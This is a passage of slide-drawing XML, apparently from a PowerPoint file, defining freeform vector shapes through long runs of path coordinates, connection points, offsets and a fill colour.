                  <a:lnTo>
                    <a:pt x="25" y="114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23" y="112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19" y="105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16" y="97"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14" y="91"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="84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4" y="65"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="59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21"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5325" y="1614"/>
              <a:ext cx="67" cy="42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65"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2" y="63"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="6" y="59"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="11" y="55"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="19" y="50"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="26" y="44"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="34" y="36"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="44" y="30"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="51" y="25"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="61" y="17"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="64" y="15"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="70" y="11"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="74" y="10"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="80" y="8"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="89" y="4"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="97" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="104" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="112" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="116" y="2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="121" y="6"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="125" y="10"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="127" y="15"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="129" y="21"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="131" y="29"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="133" y="36"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="135" y="44"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="135" y="51"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="135" y="59"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="135" y="65"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="135" y="72"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="133" y="76"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="133" y="80"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="133" y="84"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="133" y="86"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="133" y="84"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="131" y="80"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="127" y="78"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="123" y="74"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="118" y="69"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="110" y="65"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="104" y="63"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="101" y="63"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="95" y="61"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="91" y="61"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="83" y="59"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="74" y="59"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="66" y="59"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="61" y="59"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="53" y="59"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="45" y="59"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="38" y="61"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="30" y="61"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="23" y="61"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="19" y="63"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="11" y="63"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="9" y="63"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2" y="65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135" h="86">
                  <a:moveTo>
                    <a:pt x="0" y="67"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="65"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19" y="50"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26" y="44"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51" y="25"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="15"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70" y="11"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74" y="10"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80" y="8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97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1" y="6"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125" y="10"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127" y="15"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="44"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="51"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="65"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="72"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133" y="76"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133" y="80"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133" y="84"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133" y="86"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133" y="84"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131" y="80"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127" y="78"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123" y="74"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118" y="69"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110" y="65"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19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2" y="65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22"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4308" y="1576"/>
              <a:ext cx="228" cy="108"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="454" y="209"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="447" y="192"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="437" y="173"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="430" y="158"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="422" y="143"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="411" y="124"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="399" y="106"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="386" y="89"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="375" y="74"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="359" y="59"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="342" y="46"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="327" y="32"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="310" y="23"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="291" y="13"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="274" y="7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="253" y="2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="234" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="211" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="190" y="2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="167" y="4"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="143" y="11"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="120" y="19"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="97" y="27"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="76" y="36"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="57" y="46"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="38" y="53"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="23" y="61"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="10" y="68"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="0" y="74"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="10" y="72"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="27" y="68"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="44" y="65"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="63" y="63"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="84" y="59"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="107" y="55"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="129" y="53"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="152" y="51"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="173" y="49"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="194" y="49"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="211" y="49"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="226" y="53"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="240" y="55"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="264" y="65"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="289" y="76"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="314" y="95"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="329" y="106"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="344" y="118"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="359" y="129"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="375" y="144"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="390" y="156"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="405" y="169"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="422" y="184"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="445" y="203"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="454" y="213"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="456" h="215">
                  <a:moveTo>
                    <a:pt x="456" y="215"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="456" y="213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454" y="209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="451" y="205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="451" y="200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="447" y="192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443" y="182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437" y="173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="435" y="169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434" y="165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430" y="158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428" y="154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424" y="146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422" y="143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418" y="137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415" y="129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411" y="124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409" y="118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403" y="112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="399" y="106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396" y="101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392" y="95"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386" y="89"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382" y="84"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="378" y="80"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="375" y="74"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369" y="68"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="363" y="65"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="359" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348" y="49"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342" y="46"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337" y="40"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333" y="38"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327" y="32"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314" y="25"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310" y="23"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285" y="11"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280" y="9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274" y="7"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266" y="6"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240" y="0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0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60" y="6"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150" y="7"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143" y="11"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128" y="15"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105" y="23"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97" y="27"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84" y="32"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69" y="38"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57" y="46"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50" y="47"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44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29" y="57"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="65"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="68"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="7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17" y="70"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="68"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27" y="68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5"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50" y="65"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91" y="57"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129" y="53"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137" y="51"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145" y="51"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152" y="51"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160" y="49"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167" y="49"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="49"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181" y="49"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186" y="49"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194" y="49"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200" y="49"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205" y="49"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211" y="49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6" y="53"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230" y="53"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245" y="57"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="264" y="65"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272" y="66"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280" y="72"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289" y="76"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297" y="84"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304" y="87"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314" y="95"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319" y="99"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323" y="103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329" y="106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="335" y="110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338" y="114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344" y="118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348" y="122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354" y="125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="359" y="129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="363" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369" y="139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="375" y="144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="378" y="146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390" y="156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394" y="160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="399" y="165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405" y="169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409" y="173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415" y="177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422" y="184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432" y="192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437" y="198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445" y="203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449" y="207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453" y="211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454" y="213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456" y="215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456" y="215"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="D1E0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Freeform 23"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4316" y="1625"/>
              <a:ext cx="43" cy="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1" y="4"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="19" y="7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="16" y="9"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="12" y="15"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="6" y="19"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2" y="25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2" y="51"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="8" y="57"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="14" y="63"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="19" y="68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4" y="76"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="48" y="76"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="56" y="76"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="61" y="74"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="67" y="72"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="71" y="68"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="76" y="65"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="80" y="59"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="84" y="55"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="84" y="47"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="86" y="42"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="86" y="36"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="88" y="30"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="86" y="25"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="86" y="19"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="82" y="13"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="82" y="11"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="76" y="6"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="73" y="4"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="69" y="2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="63" y="0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6" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="40" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="36" y="2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="33" y="2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88" h="76">
                  <a:moveTo>
                    <a:pt x="23" y="4"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21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5"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="25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8" y="57"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19" y="68"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27" y="70"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="74"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44" y="76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61" y="74"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67" y="72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4" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84" y="47"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86" y="25"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82" y="11"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="6"/>
                  </a:lnTo>
                  <a:lnTo>
